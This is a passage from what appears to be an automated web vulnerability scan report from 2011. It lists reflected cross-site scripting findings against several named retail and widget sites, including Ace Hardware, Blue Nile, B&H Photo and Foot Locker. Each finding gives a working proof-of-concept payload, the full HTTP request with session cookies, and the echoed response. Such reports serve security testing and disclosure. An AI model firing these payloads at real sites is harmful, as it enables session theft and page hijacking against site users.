Date: Mon, 16 May 2011 10:34:57 GMT
Connection: close

//Plugins for site 5396538397932
alert(1)//3be4a2facd2
<font face="Arial" size=2>
<p>Server.MapPath()</font> <font face="Arial" size=2>error 'ASP 0174 : 80004005'</font>
<p>
<font face="Arial" size=
...[SNIP]...

5.46. http://sv.liveclicker.net/service/api [var parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://sv.liveclicker.net
Path:	/service/api

Issue detail

The value of the var request parameter is copied into the HTML document as plain text between tags. The payload c9387<script>alert(1)</script>63737674e7e was submitted in the var parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /service/api?method=liveclicker.widget.getList&account_id=311&&dim10=1&status=online&format=json&var=liveclicker.api_res[0]c9387<script>alert(1)</script>63737674e7e HTTP/1.1
Host: sv.liveclicker.net
Proxy-Connection: keep-alive
Referer: http://www.petco.com/?AID=10413444&PID=2537521&cm_mmc=CJ-_-CID-_-2537521-_-10413444
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 01:59:04 GMT
Server: Apache-Coyote/1.1
Vary: Accept-Encoding
Content-Type: application/json;charset=utf-8
Connection: close
Content-Length: 1753

liveclicker.api_res[0]c9387<script>alert(1)</script>63737674e7e = { "widgets" : { "widget" : [ { "widget_id" : "15895", "asset_id" : "27151", "versionNumber" : "1", "title" : "How To Train Your Dog to Sit", "length" : "1:07", "rating" : "0", "views" : "911455", "t
...[SNIP]...

5.47. http://t.p.mybuys.com/webrec/wr.do [ckc parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://t.p.mybuys.com
Path:	/webrec/wr.do

Issue detail

The value of the ckc request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2f479"><script>alert(1)</script>f3b7e714c62 was submitted in the ckc parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /webrec/wr.do?client=ARMANIEXCHANGE&sessionId=6451B347-829F-5F10-0394-7AA048201BB1&pt=hcat&categoryname=Womens&ckc=2f479"><script>alert(1)</script>f3b7e714c62&mbcc=736A768E-F798-53C9-B056-8FE338824CC8&lang=en&v=4.7.3&mbts=1305510843775&purl=http%3A%2F%2Fwww.armaniexchange.com%2Fcategory%2Fwomens.do HTTP/1.1
Host: t.p.mybuys.com
Proxy-Connection: keep-alive
Referer: http://www.armaniexchange.com/category/womens.do
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=B4DF5DD64853B60409638EF60D0B5CE6; mbc=sOgnt6NbgmSE4h1NwgmFVV1XNaZXwyoF

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 02:00:04 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=ISO-8859-1
Set-Cookie: JSESSIONID=4ADDCC8A6DA08BE89115D16EDFB6D509; Path=/webrec
Set-Cookie: mbc=""; Domain=.mybuys.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mbc=sOgnt6NbgmSE4h1NwgmFVV1XNaZXwyoF; Domain=.mybuys.com; Expires=Sat, 03-Jun-2079 05:14:11 GMT; Path=/
Vary: Accept-Encoding
P3P: CP="DSP CAO DEVo TAI PSD IVDo IVAo CONo HISo CUR PSA OUR IND NAV COM UNI INT", policyref="/w3c/p3p.xml"
Accept-Ranges: bytes
Cache-Control: no-store
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
x-cdn: Cotendo
Connection: Keep-Alive
Content-Length: 498

<html>
<body>
<iframe width="0" height="0" frameborder="0" id="mbadn" scrolling="no" style="display: none;" src="http://adserver.veruta.com/track.fcgi?merchantid=854445219&category=2f479"><script>alert(1)</script>f3b7e714c62&itemid=&eventid=0&ifmode=1&recommend=%7B%22dc%22%3A%224699979965478%22%2C%22slc%22%3A14%2C%22extra%22%3A%7B%22cl%22%3A%22ARMANIEXCHANGE%22%2C%22cm%22%3A%2220772879917%22%2C%22ts%22%3A%2221758520%22%7D
...[SNIP]...

5.48. http://web.aisle7.net/api/1.0/widgets/general/newswire-widget [jsonpcallback parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://web.aisle7.net
Path:	/api/1.0/widgets/general/newswire-widget

Issue detail

The value of the jsonpcallback request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 62b4f%3balert(1)//1857386a781 was submitted in the jsonpcallback parameter. This input was echoed as 62b4f;alert(1)//1857386a781 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /api/1.0/widgets/general/newswire-widget?apikey=00617ba4d64547b589e1e8b3dac082be&format=html&styles=enhanced&content_only=true&links=resource-path-encoded&request_handler_uri=http%3A%2F%2Fwww.gnc.com%2Fshop%2Findex.jsp%3FcategoryId%3D10813502%26resource%3D&clientscript=1&jsonpcallback=jsonp130551084625262b4f%3balert(1)//1857386a781 HTTP/1.1
Host: web.aisle7.net
Proxy-Connection: keep-alive
Referer: http://www.gnc.com/home/index.jsp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: aisle7c6=4090937773.1.3050751040.2686703417

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 02:01:31 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Hni-Request-Id: 9d0cadfc-2324-42cd-a008-a68d2528482e
Content-Language: en-us
Hni-Response-Time-Ms: 0
Cache-Control: public
Last-Modified: Wed, 16 Feb 2011 18:25:59 GMT
Content-Type: text/javascript; charset=utf-8
Content-Length: 3753

jsonp130551084625262b4f;alert(1)//1857386a781("\u003clink rel=\"StyleSheet\" type=\"text/css\" href=\"http://web.aisle7.net/styles/dynamic/963/10006272/enhanced.css\" xmlns=\"http://www.w3.org/1999/xhtml\"\u003e\u003c/link\u003e\u003cscript type=
...[SNIP]...

5.49. http://www.acehardware.com/category/index.jsp [clickid parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.acehardware.com
Path:	/category/index.jsp

Issue detail

The value of the clickid request parameter is copied into an HTML comment. The payload 63471--><script>alert(1)</script>f5bbaf27fb7 was submitted in the clickid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /category/index.jsp?categoryId=2568444&clickid=topnav_lawn63471--><script>alert(1)</script>f5bbaf27fb7 HTTP/1.1
Host: www.acehardware.com
Proxy-Connection: keep-alive
Referer: http://www.acehardware.com/home/index.jsp?rdir=1A
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: browser_id=125602208394; __g_c=w%3A0; __utmz=185450681.1305510171.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); JSESSIONID=TvPJNRQL1JzcpcpJnj2HmqWGjbpjhg5fysv1FyGr3Ccf5w1KDJLQ!376193557; fsr.session={"v":1,"rid":"1305510186434_570135","pv":3,"to":5,"c":"https://www.acehardware.com/checkout/index.jsp","lc":{"d0":{"v":3,"s":true,"e":1}},"cd":0,"sd":0,"f":1305542837486}; __utma=185450681.2052200100.1305510171.1305510171.1305542835.2; __utmc=185450681; __utmb=185450681.2.10.1305542835; fsr.a=1305542839068; s_pers=%20s_nr%3D1305511373000%7C1308103373000%3B%20s_lastvisit%3D1305542825522%7C1400150825522%3B%20gpv_p27%3DHome%2520Page%7C1305544639235%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Dgsicace%253D%252526pid%25253DHome%25252520Page%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//www.acehardware.com/category/index.jsp%2525253FcategoryId%2525253D2568444%252526ot%25253DA%3B

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 10:47:28 GMT
Server: Apache/2.0.63 (Unix)
Cache-Control: no-cache="set-cookie"
Pragma: no-cache
P3P: CP="PHY ONL CAO CURa ADMa DEVa TAIa PSAa PSDa IVAo IVDo CONo HISa TELo OTPo OUR DELa STP BUS UNI COM NAV INT DEM OTC",policyref="/w3c/p3p.xml"
Set-Cookie: rvdata=XR240e18041a5b4616591440465b0a0a0304; expires=Saturday, 03-Jun-2079 14:01:35 GMT; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 115862

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<script>alert(1)</script>f5bbaf27fb7 -->
...[SNIP]...

5.50. http://www.acehardware.com/category/index.jsp [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.acehardware.com
Path:	/category/index.jsp

Issue detail

The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 69603--><script>alert(1)</script>0d9d386e26 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /category/index.jsp?categoryId=2568444&clickid=topnav_lawn&69603--><script>alert(1)</script>0d9d386e26=1 HTTP/1.1
Host: www.acehardware.com
Proxy-Connection: keep-alive
Referer: http://www.acehardware.com/home/index.jsp?rdir=1A
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: browser_id=125602208394; __g_c=w%3A0; __utmz=185450681.1305510171.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); JSESSIONID=TvPJNRQL1JzcpcpJnj2HmqWGjbpjhg5fysv1FyGr3Ccf5w1KDJLQ!376193557; fsr.session={"v":1,"rid":"1305510186434_570135","pv":3,"to":5,"c":"https://www.acehardware.com/checkout/index.jsp","lc":{"d0":{"v":3,"s":true,"e":1}},"cd":0,"sd":0,"f":1305542837486}; __utma=185450681.2052200100.1305510171.1305510171.1305542835.2; __utmc=185450681; __utmb=185450681.2.10.1305542835; fsr.a=1305542839068; s_pers=%20s_nr%3D1305511373000%7C1308103373000%3B%20s_lastvisit%3D1305542825522%7C1400150825522%3B%20gpv_p27%3DHome%2520Page%7C1305544639235%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Dgsicace%253D%252526pid%25253DHome%25252520Page%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//www.acehardware.com/category/index.jsp%2525253FcategoryId%2525253D2568444%252526ot%25253DA%3B

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 10:48:06 GMT
Server: Apache/2.0.63 (Unix)
Cache-Control: no-cache="set-cookie"
Pragma: no-cache
P3P: CP="PHY ONL CAO CURa ADMa DEVa TAIa PSAa PSDa IVAo IVDo CONo HISa TELo OTPo OUR DELa STP BUS UNI COM NAV INT DEM OTC",policyref="/w3c/p3p.xml"
Set-Cookie: rvdata=XR240e18041a5b4616591440465b0a0a0304; expires=Saturday, 03-Jun-2079 14:02:13 GMT; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 115800

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<script>alert(1)</script>0d9d386e26=1 -->
...[SNIP]...

5.51. http://www.acehardware.com/home/index.jsp [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.acehardware.com
Path:	/home/index.jsp

Issue detail

The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload ba652--><script>alert(1)</script>9557872ffa1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /home/index.jsp?ba652--><script>alert(1)</script>9557872ffa1=1 HTTP/1.1
Host: www.acehardware.com
Proxy-Connection: keep-alive
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=vLQsNQBSZphCcjtDjLwwTnfpkzNq3J0JlY9vd1F9mv7FzdpT4zqh!-1418241072; browser_id=125602208394; __g_c=w%3A0; __utmz=185450681.1305510171.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=185450681.2052200100.1305510171.1305510171.1305510171.1; __utmc=185450681; __utmb=185450681.1.10.1305510171; s_pers=%20s_nr%3D1305510172030%7C1308102172030%3B%20s_lastvisit%3D1305510172069%7C1400118172069%3B%20gpv_p27%3DHome%2520Page%7C1305511972080%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; fsr.session={"v":1,"rid":"1305510186434_570135","pv":1,"to":3,"c":"http://www.acehardware.com/home/index.jsp","lc":{"d0":{"v":1,"s":false}},"cd":0,"sd":0}

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 01:55:32 GMT
Server: Apache/2.0.63 (Unix)
Cache-Control: no-cache
Pragma: no-cache
P3P: CP="PHY ONL CAO CURa ADMa DEVa TAIa PSAa PSDa IVAo IVDo CONo HISa TELo OTPo OUR DELa STP BUS UNI COM NAV INT DEM OTC",policyref="/w3c/p3p.xml"
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 108158

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<script>alert(1)</script>9557872ffa1=1 -->
...[SNIP]...

5.52. http://www.acehardware.com/home/index.jsp [rdir parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.acehardware.com
Path:	/home/index.jsp

Issue detail

The value of the rdir request parameter is copied into an HTML comment. The payload 25276--><script>alert(1)</script>ccb31578d5a was submitted in the rdir parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /home/index.jsp?rdir=1A25276--><script>alert(1)</script>ccb31578d5a HTTP/1.1
Host: www.acehardware.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: browser_id=125602208394; __g_c=w%3A0; __utmz=185450681.1305510171.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=185450681.2052200100.1305510171.1305510171.1305510171.1; __utmc=185450681; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; fsr.session={"v":1,"rid":"1305510186434_570135","pv":3,"to":5,"c":"https://www.acehardware.com/checkout/index.jsp","lc":{"d0":{"v":3,"s":true,"e":1}},"cd":0,"sd":0,"f":1305511353374}; s_pers=%20s_nr%3D1305511373000%7C1308103373000%3B%20s_lastvisit%3D1305542825522%7C1400150825522%3B%20gpv_p27%3DMy%2520Account%253A%2520Sign-In%7C1305544625524%3B; JSESSIONID=TvPJNRQL1JzcpcpJnj2HmqWGjbpjhg5fysv1FyGr3Ccf5w1KDJLQ!376193557

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 10:47:12 GMT
Server: Apache/2.0.63 (Unix)
Cache-Control: no-cache
Pragma: no-cache
P3P: CP="PHY ONL CAO CURa ADMa DEVa TAIa PSAa PSDa IVAo IVDo CONo HISa TELo OTPo OUR DELa STP BUS UNI COM NAV INT DEM OTC",policyref="/w3c/p3p.xml"
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 108183

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<script>alert(1)</script>ccb31578d5a -->
...[SNIP]...

5.53. http://www.bhphotovideo.com/c/buy/Camcorders-Housings/ci/16479/N/4267396714 [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.bhphotovideo.com
Path:	/c/buy/Camcorders-Housings/ci/16479/N/4267396714

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2542d"><a>b6abcdf389d was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /c/buy/Camcorders-Housings/ci/164792542d"><a>b6abcdf389d/N/4267396714 HTTP/1.1
Host: www.bhphotovideo.com
Proxy-Connection: keep-alive
Referer: http://www.bhphotovideo.com/c/browse/Underwater-Equipment/ci/11585/N/4294551294
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cookieID=18154535221305509932941; cmTPSet=Y; JSESSIONID=pfTcNQ5SFQ!-112699937; TS29f0cc=862fc783847fff78c55a7f1651d84fbf871d7ea6dc67d58e4dd0f99460ac0ec569178bf8b092ce85bc587bdd; cmRS=&t1=1305541019847&t2=1305541026297&t3=1305541028965&t4=1305541013259&lti=1305541028965&ln=&hr=/c/buy/Camcorders-Housings/ci/16479/N/4267396714&fti=&fn=searchForm%3A0%3BNwsLtrSgnUp_Subscribe%3A1%3B&ac=&fd=&uer=&fu=&pi=underwater-equipment.jsp&ho=server.bhphotovideo.com/cm%3F&ci=90132819

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Content-Type: text/html; charset=ISO-8859-1
X-Powered-By: Servlet/2.5 JSP/2.1
X-UA-Compatible: IE=EmulateIE7
Date: Mon, 16 May 2011 10:36:32 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: TS29f0cc=b0d1ad0ba7546d6b2b5b7e9034b704ed871d7ea6dc67d58e4dd0fe2f60ac0ec569178bf8b092ce85bc587bdd; Path=/
Content-Length: 197632

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head>
<meta http-
...[SNIP]...
<a href="http://www.bhphotovideo.com/c/buy/Camcorders-Housings/pn/15/ci/164792542d"><a>b6abcdf389d/N/4267396714">
...[SNIP]...

5.54. http://www.bhphotovideo.com/c/buy/Camcorders-Housings/ci/16479/N/4267396714 [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.bhphotovideo.com
Path:	/c/buy/Camcorders-Housings/ci/16479/N/4267396714

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload fb38f'><a>2ecfd8f2719 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /c/buy/Camcorders-Housings/ci/16479fb38f'><a>2ecfd8f2719/N/4267396714 HTTP/1.1
Host: www.bhphotovideo.com
Proxy-Connection: keep-alive
Referer: http://www.bhphotovideo.com/c/browse/Underwater-Equipment/ci/11585/N/4294551294
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cookieID=18154535221305509932941; cmTPSet=Y; JSESSIONID=pfTcNQ5SFQ!-112699937; TS29f0cc=862fc783847fff78c55a7f1651d84fbf871d7ea6dc67d58e4dd0f99460ac0ec569178bf8b092ce85bc587bdd; cmRS=&t1=1305541019847&t2=1305541026297&t3=1305541028965&t4=1305541013259&lti=1305541028965&ln=&hr=/c/buy/Camcorders-Housings/ci/16479/N/4267396714&fti=&fn=searchForm%3A0%3BNwsLtrSgnUp_Subscribe%3A1%3B&ac=&fd=&uer=&fu=&pi=underwater-equipment.jsp&ho=server.bhphotovideo.com/cm%3F&ci=90132819

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Content-Type: text/html; charset=ISO-8859-1
X-Powered-By: Servlet/2.5 JSP/2.1
X-UA-Compatible: IE=EmulateIE7
Vary: Accept-Encoding
Date: Mon, 16 May 2011 10:36:40 GMT
Connection: close
Set-Cookie: TS29f0cc=ae3fe2cae9d870f2a3b02425c0e4c166871d7ea6dc67d58e4dd0fe3760ac0ec569178bf8b092ce85bc587bdd; Path=/
Content-Length: 197632

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head>
<meta http-
...[SNIP]...
<a href='http://www.bhphotovideo.com/c/buy/Camcorders-Housings/pn/2/ci/16479fb38f'><a>2ecfd8f2719/N/4267396714'>
...[SNIP]...

5.55. http://www.bluenile.com/build-your-own-diamond-ring [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.bluenile.com
Path:	/build-your-own-diamond-ring

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 75463"style%3d"x%3aexpression(alert(1))"25b680a7acd was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 75463"style="x:expression(alert(1))"25b680a7acd in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /build-your-own-diamond-ring?first_step=diamond&forceStep=DIAMONDS_STEP&track=more&75463"style%3d"x%3aexpression(alert(1))"25b680a7acd=1 HTTP/1.1
Host: www.bluenile.com
Proxy-Connection: keep-alive
Referer: http://www.bluenile.com/engagement-rings?track=head
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: GUID=F59437BB_F744_4338_9666_F1641BDAF3E0; sitetrack=jse~1; bnper=ver~3&NIB~0&CURR~USD&CURR_SYM~%24&CONTEXT-NAME~53&DM~-&SUB~false; pop=sweeps~1; bnses=ver~1&ace~false&isbml~false&fbcs~true&new~false&ss~1&mbpop~false; bncust=ver~1&SignInURL~http%3A%2F%2Fwww.bluenile.com%2F; __utmz=1.1305541144.2.2.utmcsr=bluenile.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.637722072.1305510928.1305510928.1305541144.2; __utmc=1; __utmb=1.2.10.1305541144; testcookie=; stc=3NZR3Q

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Date: Mon, 16 May 2011 10:37:54 GMT
Pragma: no-cache
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Expires: Wed, 31 Dec 1969 23:59:59 GMT
P3P: CP="NOI DSP DEVa TAIa OUR BUS UNI STA":
Set-Cookie: stc=3NZR3Q; Domain=.bluenile.com; Expires=Sat, 12-Nov-2011 10:37:43 GMT; Path=/
Set-Cookie: bld=ver~3&BYOR~DIAMONDS_STEP-DIAMONDS_STEP-0---; Domain=.bluenile.com; Expires=Wed, 15-May-2013 10:37:43 GMT; Path=/
Set-Cookie: dsearch=ver~4&visibleBYOR~800000000&stateBYOR~RD-23-1567-------319.0-1558631.0-----------0------0%2C0%2C0-price-asc-USD--2%2C3%2C4%2C5%2C6-; Domain=.bluenile.com; Expires=Wed, 15-May-2013 10:37:43 GMT; Path=/
Vary: Accept-Encoding
Content-Length: 220459

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/" xmlns
...[SNIP]...
<meta http-equiv="refresh" content="0;url=/build-your-own-diamond-ring?75463"style="x:expression(alert(1))"25b680a7acd=1&track=more&first_step=diamond&forceStep=DIAMONDS_STEP&mode=BASIC&reason=noscript" />
...[SNIP]...

5.56. http://www.footlocker.com/login/login.cfm [bv_AA_enabled parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.footlocker.com
Path:	/login/login.cfm

Issue detail

The value of the bv_AA_enabled request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 529c3"style%3d"x%3aexpression(alert(1))"362edd0e270 was submitted in the bv_AA_enabled parameter. This input was echoed as 529c3"style="x:expression(alert(1))"362edd0e270 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /login/login.cfm?secured=false&bv_RR_enabled=true&bv_AA_enabled=529c3"style%3d"x%3aexpression(alert(1))"362edd0e270&dontRunBV=true HTTP/1.1
Host: www.footlocker.com
Proxy-Connection: keep-alive
Referer: http://www.footlocker.com/
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: text/html, */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
